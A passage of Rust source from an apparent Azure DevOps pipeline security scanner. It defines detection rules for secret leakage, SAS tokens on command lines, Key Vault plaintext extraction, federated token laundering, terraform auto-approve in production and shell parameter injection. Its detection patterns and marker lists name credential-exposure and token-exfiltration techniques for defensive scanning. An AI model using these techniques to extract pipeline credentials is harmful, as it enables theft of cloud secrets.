1858        if SAS_MINT_TOKENS.iter().any(|t| rhs.contains(t)) {
1859            // Recover original-case variable name from `body` at the same byte
1860            // offsets — `lower` and `body` share UTF-8 byte layout for ASCII,
1861            // and identifiers in PowerShell are ASCII in the corpus.
1862            let name = body
1863                .get(name_start..j)
1864                .unwrap_or(&lower[name_start..j])
1865                .to_string();
1866            if !out.iter().any(|n: &String| n.eq_ignore_ascii_case(&name)) {
1867                out.push(name);
1868            }
1869        }
1870        i = j;
1871    }
1872    out
1873}
1874
1875/// Rule: pipeline step uses an Azure VM remote-execution primitive
1876/// (Set-AzVMExtension/CustomScriptExtension, Invoke-AzVMRunCommand,
1877/// `az vm run-command invoke`, `az vm extension set`) where the executed
1878/// command line is constructed from a pipeline secret or a freshly-minted
1879/// SAS token.
1880///
1881/// Pipeline-to-VM lateral movement primitive: every pipeline run can RCE every
1882/// VM in scope, and the SAS/secret embedded in the command line is logged in
1883/// plaintext on the VM and in the ARM extension status JSON.
1884///
1885/// Detection: read each Step's `META_SCRIPT_BODY`. If the body contains a
1886/// remote-exec tool name AND (it interpolates a known pipeline secret variable
1887/// OR it mints a SAS token in the same body), fire one finding per step.
1888pub fn vm_remote_exec_via_pipeline_secret(graph: &AuthorityGraph) -> Vec<Finding> {
1889    let mut findings = Vec::new();
1890
1891    for step in graph.nodes_of_kind(NodeKind::Step) {
1892        let body = match step.metadata.get(META_SCRIPT_BODY) {
1893            Some(b) if !b.is_empty() => b,
1894            _ => continue,
1895        };
1896        let body_lower = body.to_lowercase();
1897        if !body_uses_vm_remote_exec(&body_lower) {
1898            continue;
1899        }
1900
1901        let secret_names = step_secret_var_names(graph, step.id);
1902        let secret_interpolated = secret_names
1903            .iter()
1904            .any(|name| body_interpolates_var(body, name));
1905        let mints_sas = body_mints_sas(&body_lower);
1906
1907        if !secret_interpolated && !mints_sas {
1908            continue;
1909        }
1910
1911        // Pick a single tool name for the message.
1912        let tool = VM_REMOTE_EXEC_TOKENS
1913            .iter()
1914            .find(|t| body_lower.contains(*t))
1915            .copied()
1916            .unwrap_or("Set-AzVMExtension");
1917
1918        let trigger = if secret_interpolated {
1919            "interpolating a pipeline secret into the executed command line"
1920        } else {
1921            "embedding a freshly-minted SAS token into the executed command line"
1922        };
1923
1924        let mut nodes_involved = vec![step.id];
1925        // Include the secret nodes the step has access to so consumers can
1926        // attribute the finding to the leaked credential.
1927        for edge in graph.edges_from(step.id) {
1928            if edge.kind == EdgeKind::HasAccessTo {
1929                if let Some(n) = graph.node(edge.to) {
1930                    if n.kind == NodeKind::Secret {
1931                        nodes_involved.push(n.id);
1932                    }
1933                }
1934            }
1935        }
1936
1937        findings.push(Finding {
1938            severity: Severity::High,
1939            category: FindingCategory::VmRemoteExecViaPipelineSecret,
1940            path: None,
1941            nodes_involved,
1942            message: format!(
1943                "Step '{}' uses {} {} — pipeline-to-VM RCE primitive; credential is logged on the VM and in ARM extension status",
1944                step.name, tool, trigger
1945            ),
1946            recommendation: Recommendation::Manual {
1947                action: "Stage the script on the VM and pass the SAS via env var or protectedSettings (encrypted, not logged); avoid embedding secrets in commandToExecute".into(),
1948            },
1949            source: FindingSource::BuiltIn,
1950                extras: FindingExtras::default(),
1951});
1952    }
1953
1954    findings
1955}
1956
1957/// Heuristic: line prefix looks like a bash/sh assignment to an env var.
1958/// Conservative — only matches when the LHS contains `<keyword>? IDENT=` and
1959/// nothing after the `=` other than optional opening quote characters.
1960fn matches_bash_assignment(lhs: &str) -> bool {
1961    // `export FOO=`, `declare FOO=`, `local FOO=`, `readonly FOO=`, plain `FOO=`
1962    let after_keyword = strip_one_of(lhs, &["export ", "declare ", "local ", "readonly "])
1963        .unwrap_or(lhs)
1964        .trim_start();
1965    // Allow trailing opening-quote characters between `=` and the secret ref.
1966    let trimmed = after_keyword.trim_end_matches(['"', '\'']);
1967    let Some(ident) = trimmed.strip_suffix('=') else {
1968        return false;
1969    };
1970    !ident.is_empty()
1971        && ident.chars().all(is_shell_var_char)
1972        && !ident.starts_with(|c: char| c.is_ascii_digit())
1973}
1974
1975/// Heuristic: line prefix looks like a PowerShell assignment.
1976fn matches_powershell_assignment(lhs: &str) -> bool {
1977    // Strip trailing opening quote and whitespace so `$x = "$(SECRET)` matches.
1978    let trimmed = lhs.trim_end().trim_end_matches(['"', '\'']).trim_end();
1979    if let Some(before_eq) = trimmed.strip_suffix('=') {
1980        let before_eq = before_eq.trim_end();
1981        if before_eq.starts_with('$') {
1982            return true;
1983        }
1984    }
1985    // `Set-Variable ... -Value`
1986    if trimmed.contains("Set-Variable") && trimmed.contains("-Value") {
1987        return true;
1988    }
1989    false
1990}
1991
1992fn is_shell_var_char(c: char) -> bool {
1993    c.is_ascii_alphanumeric() || c == '_'
1994}
1995
1996fn strip_one_of<'a>(s: &'a str, prefixes: &[&str]) -> Option<&'a str> {
1997    for p in prefixes {
1998        if let Some(rest) = s.strip_prefix(p) {
1999            return Some(rest);
2000        }
2001    }
2002    None
2003}
2004
2005/// Rule: pipeline secret exported via shell variable inside an inline script.
2006///
2007/// Severity: High. ADO masks the literal token `$(SECRET)` when it appears in
2008/// log output, but masking happens on the rendered command string before the
2009/// shell runs. Once the value is bound to a shell variable, downstream
2010/// transcripts (`Start-Transcript`, `bash -x`, terraform `TF_LOG=DEBUG`,
2011/// `az --debug`) print the cleartext.
2012pub fn secret_to_inline_script_env_export(graph: &AuthorityGraph) -> Vec<Finding> {
2013    let mut findings = Vec::new();
2014
2015    for step in graph.nodes_of_kind(NodeKind::Step) {
2016        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2017            continue;
2018        };
2019        if script.is_empty() {
2020            continue;
2021        }
2022        let secrets = step_secret_names(graph, step.id);
2023        let exposed: Vec<String> = secrets
2024            .into_iter()
2025            .filter(|s| script_assigns_secret_to_shell_var(script, s))
2026            .collect();
2027
2028        if exposed.is_empty() {
2029            continue;
2030        }
2031
2032        let n = exposed.len();
2033        let preview: String = exposed
2034            .iter()
2035            .take(3)
2036            .map(|s| format!("$({s})"))
2037            .collect::<Vec<_>>()
2038            .join(", ");
2039        let suffix = if n > 3 {
2040            format!(", and {} more", n - 3)
2041        } else {
2042            String::new()
2043        };
2044        let secret_node_ids: Vec<NodeId> = graph
2045            .edges_from(step.id)
2046            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2047            .filter_map(|e| graph.node(e.to))
2048            .filter(|n| n.kind == NodeKind::Secret && exposed.contains(&n.name))
2049            .map(|n| n.id)
2050            .collect();
2051
2052        let mut nodes_involved = vec![step.id];
2053        nodes_involved.extend(secret_node_ids);
2054
2055        findings.push(Finding {
2056            severity: Severity::High,
2057            category: FindingCategory::SecretToInlineScriptEnvExport,
2058            path: None,
2059            nodes_involved,
2060            message: format!(
2061                "Step '{}' assigns pipeline secret(s) {preview}{suffix} to shell variables inside an inline script — once bound to a variable the value bypasses ADO's $(SECRET) log mask and will appear in any transcript (Start-Transcript, bash -x, terraform/az --debug)",
2062                step.name
2063            ),
2064            recommendation: Recommendation::TsafeRemediation {
2065                command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
2066                explanation: "Inject the secret as an env var on the step itself (ADO `env:` block) instead of materialising it inside the script body. The value still reaches the process but never travels through a shell variable assignment that transcripts can capture.".to_string(),
2067            },
2068            source: FindingSource::BuiltIn,
2069                extras: FindingExtras::default(),
2070});
2071    }
2072
2073    findings
2074}
2075
2076/// How a `resources.repositories[].ref` value resolves for the purposes of
2077/// the `template_extends_unpinned_branch` rule.
2078enum RepositoryRefClass {
2079    /// SHA-pinned, tag-pinned — code at the consumer is immutable.
2080    Pinned,
2081    /// No `ref:` field — resolves to the repo's default branch.
2082    DefaultBranch,
2083    /// `refs/heads/<name>` or bare branch — mutable.
2084    MutableBranch(String),
2085}
2086
2087fn classify_repository_ref(ref_value: Option<&str>) -> RepositoryRefClass {
2088    let raw = match ref_value {
2089        None => return RepositoryRefClass::DefaultBranch,
2090        Some(s) if s.trim().is_empty() => return RepositoryRefClass::DefaultBranch,
2091        Some(s) => s.trim(),
2092    };
2093
2094    // Bare 40+ hex SHA — pinned.
2095    if is_hex_sha(raw) {
2096        return RepositoryRefClass::Pinned;
2097    }
2098
2099    // refs/tags/<x> — pinned.
2100    if let Some(tag) = raw.strip_prefix("refs/tags/") {
2101        if !tag.is_empty() {
2102            return RepositoryRefClass::Pinned;
2103        }
2104    }
2105
2106    // refs/heads/<x> — mutable, unless trailing segment is a SHA.
2107    if let Some(branch) = raw.strip_prefix("refs/heads/") {
2108        if is_hex_sha(branch) {
2109            return RepositoryRefClass::Pinned;
2110        }
2111        return RepositoryRefClass::MutableBranch(branch.to_string());
2112    }
2113
2114    // Bare value — treat as a branch name.
2115    RepositoryRefClass::MutableBranch(raw.to_string())
2116}
2117
2118fn is_hex_sha(s: &str) -> bool {
2119    s.len() >= 40 && s.chars().all(|c| c.is_ascii_hexdigit())
2120}
2121
2122/// Rule: a SAS token minted in-pipeline is passed as a CLI argument or
2123/// interpolated into `commandToExecute` / `scriptArguments` / `--arguments` /
2124/// `-ArgumentList` rather than via env var or stdin.
2125///
2126/// Even short-lived SAS tokens in argv hit Linux `/proc/*/cmdline`, Windows
2127/// ETW process-create events, and ARM extension status — logged for the
2128/// SAS lifetime.
2129///
2130/// Detection: read each Step's `META_SCRIPT_BODY`. Body must (a) mint a SAS
2131/// token AND (b) reference a command-line sink keyword. Heuristic acceptable:
2132/// the goal is to catch the corpus pattern, not perfect specificity.
2133pub fn short_lived_sas_in_command_line(graph: &AuthorityGraph) -> Vec<Finding> {
2134    let mut findings = Vec::new();
2135
2136    for step in graph.nodes_of_kind(NodeKind::Step) {
2137        let body = match step.metadata.get(META_SCRIPT_BODY) {
2138            Some(b) if !b.is_empty() => b,
2139            _ => continue,
2140        };
2141        let body_lower = body.to_lowercase();
2142
2143        if !body_mints_sas(&body_lower) {
2144            continue;
2145        }
2146        if !body_has_cmdline_sink(&body_lower) {
2147            continue;
2148        }
2149
2150        // Tighten precision: at least one minted-SAS variable must actually
2151        // appear interpolated somewhere in the script body. This filters out
2152        // scripts that mint a SAS purely for upload-to-blob and never put it
2153        // on argv.
2154        let sas_vars = powershell_sas_assignments(body);
2155        let mut interpolated_var: Option<String> = None;
2156        for v in &sas_vars {
2157            if body_interpolates_var(body, v) {
2158                interpolated_var = Some(v.clone());
2159                break;
2160            }
2161        }
2162        // If we couldn't bind a SAS var (e.g. inline `az`-CLI subshell), fall
2163        // back to "mint+sink in same script" — still better than no signal.
2164        let evidence = interpolated_var
2165            .as_deref()
2166            .map(|v| format!("$ {v} interpolated into argv"))
2167            .unwrap_or_else(|| "SAS-mint and command-line sink in same script".to_string());
2168
2169        findings.push(Finding {
2170            severity: Severity::Medium,
2171            category: FindingCategory::ShortLivedSasInCommandLine,
2172            path: None,
2173            nodes_involved: vec![step.id],
2174            message: format!(
2175                "Step '{}' mints a SAS token and passes it on the command line ({}) — argv lands in /proc, ETW, and ARM extension status for the token's lifetime",
2176                step.name, evidence
2177            ),
2178            recommendation: Recommendation::Manual {
2179                action: "Pass the SAS via env var, stdin, or VM-extension protectedSettings; never put SAS tokens in commandToExecute / --arguments / -ArgumentList".into(),
2180            },
2181            source: FindingSource::BuiltIn,
2182                extras: FindingExtras::default(),
2183});
2184    }
2185
2186    findings
2187}
2188
2189/// Returns true if `line` contains a sink that writes its left-hand-side
2190/// content to a file path. Recognises the common bash and PowerShell
2191/// "write to file" idioms.
2192fn line_writes_to_file(line: &str) -> bool {
2193    // bash: `>`, `>>`, `tee`, `cat <<`/`<<-` heredoc redirected with `>`
2194    if line.contains(" > ")
2195        || line.contains(" >> ")
2196        || line.contains(">/")
2197        || line.contains(">>/")
2198        || line.contains("| tee ")
2199        || line.contains("| tee -")
2200        || line.starts_with("tee ")
2201    {
2202        return true;
2203    }
2204    // PowerShell: Out-File, Set-Content, Add-Content, [IO.File]::WriteAllText
2205    let lower = line.to_lowercase();
2206    if lower.contains("out-file")
2207        || lower.contains("set-content")
2208        || lower.contains("add-content")
2209        || lower.contains("writealltext")
2210        || lower.contains("writealllines")
2211    {
2212        return true;
2213    }
2214    false
2215}
2216
2217/// Returns true if `line` references a workspace path or a config-file
2218/// extension we consider risky for secret materialisation.
2219fn line_references_workspace_path(line: &str) -> bool {
2220    let lower = line.to_lowercase();
2221    if lower.contains("$(system.defaultworkingdirectory)")
2222        || lower.contains("$(build.sourcesdirectory)")
2223        || lower.contains("$(pipeline.workspace)")
2224        || lower.contains("$(agent.builddirectory)")
2225        || lower.contains("$(agent.tempdirectory)")
2226    {
2227        return true;
2228    }
2229    // Common credential / config file extensions
2230    const RISKY_EXT: &[&str] = &[
2231        ".tfvars",
2232        ".env",
2233        ".hcl",
2234        ".pfx",
2235        ".key",
2236        ".pem",
2237        ".crt",
2238        ".p12",
2239        ".kubeconfig",
2240        ".jks",
2241        ".keystore",
2242    ];
2243    RISKY_EXT.iter().any(|ext| lower.contains(ext))
2244}
2245
2246/// Heuristic: returns true if `script` materialises `secret` to a workspace
2247/// file. Looks for a single line that contains the secret reference AND a
2248/// "write to file" sink AND a workspace/credfile path target.
2249///
2250/// Also detects the heredoc + Out-File pattern across multiple lines:
2251/// the secret appears inside a `@" ... "@` block whose final pipe is
2252/// `Out-File <workspace-path>`.
2253fn script_materialises_secret_to_file(script: &str, secret: &str) -> bool {
2254    let needle = format!("$({secret})");
2255
2256    // Pass 1: single-line write. Catches `echo $(SECRET) > /tmp/x.env`,
2257    // `Out-File ... $(SECRET) ...`, etc.
2258    for line in script.lines() {
2259        if line.contains(&needle)
2260            && line_writes_to_file(line)
2261            && line_references_workspace_path(line)
2262        {
2263            return true;
2264        }
2265    }
2266
2267    // Pass 2: PowerShell pattern `$X = "$(SECRET)"` followed by the variable
2268    // being piped into Out-File / Set-Content with a workspace path. We
2269    // detect this conservatively: if any line assigns `$x = "$(SECRET)"`
2270    // AND any *later* line both writes-to-file and references a workspace
2271    // path, we flag it. False-positive risk is low because the ASLR-style
2272    // `$x` typically won't be reused for unrelated content within the same
2273    // inline block.
2274    let mut secret_bound_to_var = false;
2275    for line in script.lines() {
2276        let trimmed = line.trim();
2277        if !secret_bound_to_var
2278            && trimmed.contains(&needle)
2279            && trimmed.starts_with('$')
2280            && trimmed.contains('=')
2281        {
2282            secret_bound_to_var = true;
2283            continue;
2284        }
2285        if secret_bound_to_var && line_writes_to_file(line) && line_references_workspace_path(line)
2286        {
2287            return true;
2288        }
2289    }
2290
2291    false
2292}
2293
2294/// Rule: pipeline secret materialised to a file under the agent workspace.
2295///
2296/// Severity: High. Files written under `$(System.DefaultWorkingDirectory)` /
2297/// `$(Build.SourcesDirectory)` survive the writing step's lifetime, are
2298/// uploaded by `PublishPipelineArtifact` tasks (sometimes accidentally), and
2299/// remain readable by every subsequent step in the same job.
2300pub fn secret_materialised_to_workspace_file(graph: &AuthorityGraph) -> Vec<Finding> {
2301    let mut findings = Vec::new();
2302
2303    for step in graph.nodes_of_kind(NodeKind::Step) {
2304        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2305            continue;
2306        };
2307        if script.is_empty() {
2308            continue;
2309        }
2310        let secrets = step_secret_names(graph, step.id);
2311        let materialised: Vec<String> = secrets
2312            .into_iter()
2313            .filter(|s| script_materialises_secret_to_file(script, s))
2314            .collect();
2315
2316        if materialised.is_empty() {
2317            continue;
2318        }
2319
2320        let n = materialised.len();
2321        let preview: String = materialised
2322            .iter()
2323            .take(3)
2324            .map(|s| format!("$({s})"))
2325            .collect::<Vec<_>>()
2326            .join(", ");
2327        let suffix = if n > 3 {
2328            format!(", and {} more", n - 3)
2329        } else {
2330            String::new()
2331        };
2332
2333        let secret_node_ids: Vec<NodeId> = graph
2334            .edges_from(step.id)
2335            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2336            .filter_map(|e| graph.node(e.to))
2337            .filter(|n| n.kind == NodeKind::Secret && materialised.contains(&n.name))
2338            .map(|n| n.id)
2339            .collect();
2340
2341        let mut nodes_involved = vec![step.id];
2342        nodes_involved.extend(secret_node_ids);
2343
2344        findings.push(Finding {
2345            severity: Severity::High,
2346            category: FindingCategory::SecretMaterialisedToWorkspaceFile,
2347            path: None,
2348            nodes_involved,
2349            message: format!(
2350                "Step '{}' writes pipeline secret(s) {preview}{suffix} to a file under the agent workspace — the file persists for the rest of the job, is readable by every subsequent step, and may be uploaded by PublishPipelineArtifact",
2351                step.name
2352            ),
2353            recommendation: Recommendation::Manual {
2354                action: "Replace inline secret materialisation with the `secureFile` task (downloaded to a temp dir with 0600 perms and auto-deleted), or pass the secret to the consuming tool over stdin / an env var instead of via a workspace file. If a file is unavoidable, write under `$(Agent.TempDirectory)` and `chmod 600` immediately.".into(),
2355            },
2356            source: FindingSource::BuiltIn,
2357                extras: FindingExtras::default(),
2358});
2359    }
2360
2361    findings
2362}
2363
2364/// Returns true if `script` contains a Key Vault → plaintext extraction
2365/// pattern that lands the secret in a non-`SecureString` variable.
2366fn script_extracts_keyvault_to_plaintext(script: &str) -> bool {
2367    let lower = script.to_lowercase();
2368    // New syntax: Get-AzKeyVaultSecret ... -AsPlainText
2369    if lower.contains("get-azkeyvaultsecret") && lower.contains("-asplaintext") {
2370        return true;
2371    }
2372    // ConvertFrom-SecureString ... -AsPlainText (PS 7+) — flat plaintext extraction
2373    if lower.contains("convertfrom-securestring") && lower.contains("-asplaintext") {
2374        return true;
2375    }
2376    // Old syntax: ($x = (Get-AzKeyVaultSecret ...).SecretValueText)
2377    if lower.contains("get-azkeyvaultsecret") && lower.contains(".secretvaluetext") {
2378        return true;
2379    }
2380    // Even older: BSTR pattern — ConvertToString on PtrToStringAuto
2381    if lower.contains("get-azkeyvaultsecret") && lower.contains("ptrtostringauto") {
2382        return true;
2383    }
2384    false
2385}
2386
2387/// Rule: PowerShell pulls a Key Vault secret as plaintext inside an inline
2388/// script. The value never crosses the ADO variable-group boundary so
2389/// pipeline log masking does not apply — verbose `Az` / PowerShell logging
2390/// (`Set-PSDebug -Trace`, `$VerbosePreference = "Continue"`, error stack
2391/// traces) will print the cleartext credential.
2392///
2393/// Severity: Medium. Lower than the materialisation rules because the value
2394/// is at least kept in process memory (vs. on disk), but still a real
2395/// exposure path that pipeline-level secret rotation alone does not fix.
2396pub fn keyvault_secret_to_plaintext(graph: &AuthorityGraph) -> Vec<Finding> {
2397    let mut findings = Vec::new();
2398
2399    for step in graph.nodes_of_kind(NodeKind::Step) {
2400        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2401            continue;
2402        };
2403        if script.is_empty() {
2404            continue;
2405        }
2406        if !script_extracts_keyvault_to_plaintext(script) {
2407            continue;
2408        }
2409
2410        findings.push(Finding {
2411            severity: Severity::Medium,
2412            category: FindingCategory::KeyVaultSecretToPlaintext,
2413            path: None,
2414            nodes_involved: vec![step.id],
2415            message: format!(
2416                "Step '{}' extracts a Key Vault secret as plaintext inside an inline script (-AsPlainText / .SecretValueText) — value bypasses ADO variable-group masking and is printed by Az verbose logging or any error stack trace",
2417                step.name
2418            ),
2419            recommendation: Recommendation::Manual {
2420                action: "Keep the secret as a `SecureString`: drop `-AsPlainText`, pass the SecureString directly to cmdlets that accept it (e.g. `New-PSCredential`, `Connect-AzAccount -ServicePrincipal -Credential ...`), and only convert to plaintext at the moment of consumption, scoped to a single expression. For values that must be plaintext (REST calls, env vars) prefer ADO variable groups linked to Key Vault — the value then participates in pipeline log masking.".into(),
2421            },
2422            source: FindingSource::BuiltIn,
2423                extras: FindingExtras::default(),
2424});
2425    }
2426
2427    findings
2428}
2429
2430/// Returns true when `name` (case-insensitive) looks like a production
2431/// service-connection name. Matches `prod` / `production` / `prd` either as
2432/// the entire name, a token surrounded by `-`/`_`, or a leading/trailing
2433/// segment (`prod-foo`, `foo-prd`). Conservative: avoids matching
2434/// substrings like "approver" or "reproduce".
2435fn looks_like_prod_connection(name: &str) -> bool {
2436    let lower = name.to_lowercase();
2437    let token_match = |s: &str| {
2438        lower == s
2439            || lower.contains(&format!("-{s}-"))
2440            || lower.contains(&format!("_{s}_"))
2441            || lower.ends_with(&format!("-{s}"))
2442            || lower.ends_with(&format!("_{s}"))
2443            || lower.starts_with(&format!("{s}-"))
2444            || lower.starts_with(&format!("{s}_"))
2445    };
2446    token_match("prod") || token_match("production") || token_match("prd")
2447}
2448
2449/// Returns true when an inline script body looks like it laundering federated
2450/// SPN/OIDC token material into a pipeline variable via
2451/// `##vso[task.setvariable]`. Used to escalate addspn_with_inline_script's
2452/// message wording when explicit laundering is detected.
2453fn script_launders_spn_token(s: &str) -> bool {
2454    let lower = s.to_lowercase();
2455    if !lower.contains("##vso[task.setvariable") {
2456        return false;
2457    }
2458    let token_markers = [
2459        "$env:idtoken",
2460        "$env:serviceprincipalkey",
2461        "$env:serviceprincipalid",
2462        "$env:tenantid",
2463        "arm_oidc_token",
2464        "arm_client_id",
2465        "arm_client_secret",
2466        "arm_tenant_id",
2467    ];
2468    token_markers.iter().any(|m| lower.contains(m))
2469}
2470
2471/// Rule: `terraform apply -auto-approve` against a production service
2472/// connection without an environment approval gate.
2473///
2474/// Combines three signals on a Step node:
2475///   1. `META_TERRAFORM_AUTO_APPROVE` = "true" (set by the parser when an
2476///      inline script runs `terraform apply --auto-approve`, or a
2477///      `TerraformCLI@N` task has `command: apply` + commandOptions
2478///      containing `auto-approve`).
2479///   2. `META_SERVICE_CONNECTION_NAME` matches a production-named pattern
2480///      (`prod`, `production`, `prd`), OR the step is linked via
2481///      `HasAccessTo` to an Identity service-connection node whose name
2482///      matches that pattern.
2483///   3. The step is NOT inside an `environment:`-bound deployment job
2484///      (parser sets `META_ENV_APPROVAL` for those steps).
2485///
2486/// Severity: Critical. Bypasses the only ADO-side change-control on
2487/// infra rewrites.
2488pub fn terraform_auto_approve_in_prod(graph: &AuthorityGraph) -> Vec<Finding> {
2489    let mut findings = Vec::new();
2490
2491    for step in graph.nodes_of_kind(NodeKind::Step) {
2492        let auto_approve = step
2493            .metadata
2494            .get(META_TERRAFORM_AUTO_APPROVE)
2495            .map(|v| v == "true")
2496            .unwrap_or(false);
2497        if !auto_approve {
2498            continue;
2499        }
2500
2501        // Step's own service-connection name (set by parser from
2502        // azureSubscription / connectedServiceName / etc).
2503        let direct_conn = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
2504
2505        // Walk HasAccessTo edges to find a service-connection Identity. This
2506        // catches steps that don't carry the name on themselves but inherit
2507        // an Identity node via the parser's edge.
2508        let edge_conn = graph
2509            .edges_from(step.id)
2510            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2511            .filter_map(|e| graph.node(e.to))
2512            .find(|n| {
2513                n.kind == NodeKind::Identity
2514                    && n.metadata
2515                        .get(META_SERVICE_CONNECTION)
2516                        .map(|v| v == "true")
2517                        .unwrap_or(false)
2518            })
2519            .map(|n| n.name.clone());
2520
2521        let conn_name = match direct_conn.or(edge_conn) {
2522            Some(n) if looks_like_prod_connection(&n) => n,
2523            _ => continue,
2524        };
2525
2526        // Compensating control: an `environment:` binding routes the apply
2527        // through ADO's approval / check pipeline. Whether that environment
2528        // *actually* has approvers configured is invisible from YAML — so
2529        // downgrade Critical → Medium instead of skipping outright (the
2530        // previous behaviour silently dropped the finding even when the
2531        // environment was a CI-only approval-free passthrough).
2532        let env_gated = step
2533            .metadata
2534            .get(META_ENV_APPROVAL)
2535            .map(|v| v == "true")
2536            .unwrap_or(false);
2537        let (severity, suffix) = if env_gated {
2538            (
2539                Severity::Medium,
2540                " — `environment:` binding present (verify approvers are configured in the ADO Environments UI)",
2541            )
2542        } else {
2543            (
2544                Severity::Critical,
2545                " — any committer can rewrite prod infrastructure",
2546            )
2547        };
2548
2549        findings.push(Finding {
2550            severity,
2551            category: FindingCategory::TerraformAutoApproveInProd,
2552            path: None,
2553            nodes_involved: vec![step.id],
2554            message: format!(
2555                "Step '{}' runs `terraform apply -auto-approve` against production service connection '{}'{}",
2556                step.name, conn_name, suffix
2557            ),
2558            recommendation: Recommendation::Manual {
2559                action: "Move the apply step into a deployment job whose `environment:` is configured with required approvers in ADO, OR remove `-auto-approve` and run apply behind a manual checkpoint task. Combine with a non-shared agent pool so committers cannot pre-stage payloads.".into(),
2560            },
2561            source: FindingSource::BuiltIn,
2562                extras: FindingExtras::default(),
2563});
2564    }
2565
2566    findings
2567}
2568
2569/// Rule: `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline
2570/// script body. The inline script can launder federated SPN material
2571/// (`$env:idToken`, `$env:servicePrincipalKey`, `$env:tenantId`) into normal
2572/// pipeline variables via `##vso[task.setvariable]`, leaking OIDC tokens to
2573/// downstream tasks/artifacts un-masked.
2574///
2575/// Severity: High. Escalates message wording when the script body contains
2576/// explicit laundering patterns (`##vso[task.setvariable ...]` writing one
2577/// of the well-known token env vars or `ARM_OIDC_TOKEN`).
2578pub fn addspn_with_inline_script(graph: &AuthorityGraph) -> Vec<Finding> {
2579    let mut findings = Vec::new();
2580
2581    for step in graph.nodes_of_kind(NodeKind::Step) {
2582        let add_spn = step
2583            .metadata
2584            .get(META_ADD_SPN_TO_ENV)
2585            .map(|v| v == "true")
2586            .unwrap_or(false);
2587        if !add_spn {
2588            continue;
2589        }
2590
2591        let body = match step.metadata.get(META_SCRIPT_BODY) {
2592            Some(b) if !b.trim().is_empty() => b,
2593            _ => continue,
2594        };
2595
2596        let launders = script_launders_spn_token(body);
2597        let suffix = if launders {
2598            " — explicit token laundering detected (##vso[task.setvariable] writes federated token material)"
2599        } else {
2600            ""
2601        };
2602
2603        findings.push(Finding {
2604            severity: Severity::High,
2605            category: FindingCategory::AddSpnWithInlineScript,
2606            path: None,
2607            nodes_involved: vec![step.id],
2608            message: format!(
2609                "Step '{}' runs an inline script with addSpnToEnvironment:true — the federated SPN (idToken/servicePrincipalKey/tenantId) is exposed to script-controlled code and can be exfiltrated via setvariable{}",
2610                step.name, suffix
2611            ),
2612            recommendation: Recommendation::Manual {
2613                action: "Replace the inline script with `scriptPath:` pointing to a reviewed file in-repo, OR drop `addSpnToEnvironment: true` and use the task's first-class auth surface. Never emit federated token material via `##vso[task.setvariable]` — those values are inherited by every downstream task and may appear in logs.".into(),
2614            },
2615            source: FindingSource::BuiltIn,
2616                extras: FindingExtras::default(),
2617});
2618    }
2619
2620    findings
2621}
2622
2623/// Rule: free-form `type: string` parameter (no `values:` allowlist)
2624/// interpolated via `${{ parameters.<name> }}` directly into an inline
2625/// shell/PowerShell script body. ADO does not escape parameter values in
2626/// YAML emission, so any user with "queue build" can inject shell.
2627///
2628/// Detection requires the parser to populate
2629/// `AuthorityGraph::parameters` (currently ADO only) and to stamp Step
2630/// nodes with `META_SCRIPT_BODY`.
2631///
2632/// Severity: Medium.
2633pub fn parameter_interpolation_into_shell(graph: &AuthorityGraph) -> Vec<Finding> {
2634    if graph.parameters.is_empty() {
2635        return Vec::new();
2636    }
2637
2638    // Free-form string parameters: type is `string` (or unspecified — ADO's
2639    // default) AND no `values:` allowlist.
2640    let free_form: Vec<&str> = graph
2641        .parameters
2642        .iter()
2643        .filter(|(_, spec)| {
2644            !spec.has_values_allowlist
2645                && (spec.param_type.is_empty() || spec.param_type.eq_ignore_ascii_case("string"))
2646        })
2647        .map(|(name, _)| name.as_str())
2648        .collect();
2649
2650    if free_form.is_empty() {
2651        return Vec::new();
2652    }
2653
2654    let mut findings = Vec::new();
2655
2656    for step in graph.nodes_of_kind(NodeKind::Step) {
2657        let body = match step.metadata.get(META_SCRIPT_BODY) {
2658            Some(b) if !b.is_empty() => b,
2659            _ => continue,
2660        };
2661
2662        // Find every free-form parameter that appears interpolated in the
2663        // script body. Match both `${{ parameters.X }}` and `${{parameters.X}}`.
2664        let mut hits: Vec<&str> = Vec::new();
2665        for &name in &free_form {
2666            let needle_a = format!("${{{{ parameters.{name} }}}}");
2667            let needle_b = format!("${{{{parameters.{name}}}}}");
2668            if body.contains(&needle_a) || body.contains(&needle_b) {
2669                hits.push(name);
2670            }
2671        }
2672
2673        if hits.is_empty() {
2674            continue;
2675        }
2676
2677        hits.sort();
2678        hits.dedup();
2679        let names = hits.join(", ");
2680
2681        findings.push(Finding {
2682            severity: Severity::Medium,
2683            category: FindingCategory::ParameterInterpolationIntoShell,
2684            path: None,
2685            nodes_involved: vec![step.id],
2686            message: format!(
2687                "Step '{}' interpolates free-form string parameter(s) [{}] into an inline script — anyone with 'queue build' permission can inject shell commands",
2688                step.name, names
2689            ),
2690            recommendation: Recommendation::Manual {
2691                action: "Add a `values:` allowlist to the parameter declaration to constrain accepted inputs, OR pass the parameter through the step's `env:` block so the runtime quotes it as a shell variable instead of YAML-interpolating raw text.".into(),
2692            },
2693            source: FindingSource::BuiltIn,
2694                extras: FindingExtras::default(),
2695});
2696    }
2697
2698    findings
2699}
2700
2701/// Rule: ADO terraform-output → `task.setvariable` → downstream shell
2702/// expansion, a 2-step injection chain.
2703///
2704/// **Phase 1 (capture step):** an inline ADO script body
2705/// (`META_SCRIPT_BODY`) that contains BOTH:
2706///   - a "terraform output capture" signal — either a literal `terraform
2707///     output` CLI invocation (with or without `-raw <name>` / `-json`),
2708///     OR a reference to a `TF_OUT_*` env var (the standard naming
2709///     convention for env vars sourced from a `TerraformCLI@*`
2710///     `command: output` task), AND
2711///   - a `##vso[task.setvariable variable=NAME ...]VALUE` directive.
2712///
2713/// **Phase 2 (sink step):** a *later* Step in the SAME job (matched via
2714/// `META_JOB_NAME`) whose script body expands `$(NAME)` in
2715/// shell-expansion position, where "shell-expansion position" is any of:
2716///   - inside `bash -c "..."` / `bash -c '...'`
2717///   - inside `eval "..."` / `eval '...'` / `eval $(...)`
2718///   - inside command substitution `$(... $(NAME) ...)`
